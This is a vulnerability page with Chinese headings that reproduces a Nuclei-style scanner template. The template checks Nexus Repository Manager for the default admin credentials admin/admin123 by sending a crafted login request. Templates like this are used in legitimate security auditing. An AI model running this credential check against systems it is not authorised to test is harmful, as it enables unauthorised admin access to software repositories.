漏洞描述
Nexus default admin credentials were discovered.
nexus-default-login: Nexus Default Login
PoC代码[已公开]
id: nexus-default-login
info:
name: Nexus Default Login
author: pikpikcu
severity: high
description: Nexus default admin credentials were discovered.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
metadata:
max-request: 1
tags: nexus,default-login,vuln
http:
- raw:
- |
POST /service/rapture/session HTTP/1.1
Host: {{Hostname}}
X-Nexus-UI: true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
username={{base64(username)}}&password={{base64(password)}}
payloads:
username:
- admin
password:
- admin123
attack: pitchfork
matchers-condition: and
matchers:
- type: status
status:
- 204
- type: word
words:
- "Server: Nexus"
- "NXSESSIONID"
part: header
condition: and
# digest: 490a00463044022074ee059970b6683104f92fd3c08883662f12aaf511a946516e556ac4ed969e1602201672e7d73f04ff070942ba8d9756b0abb5cba5c1831f1c0b97bfe75ada7021c4:922c64590222798bb761d5b6d8e72950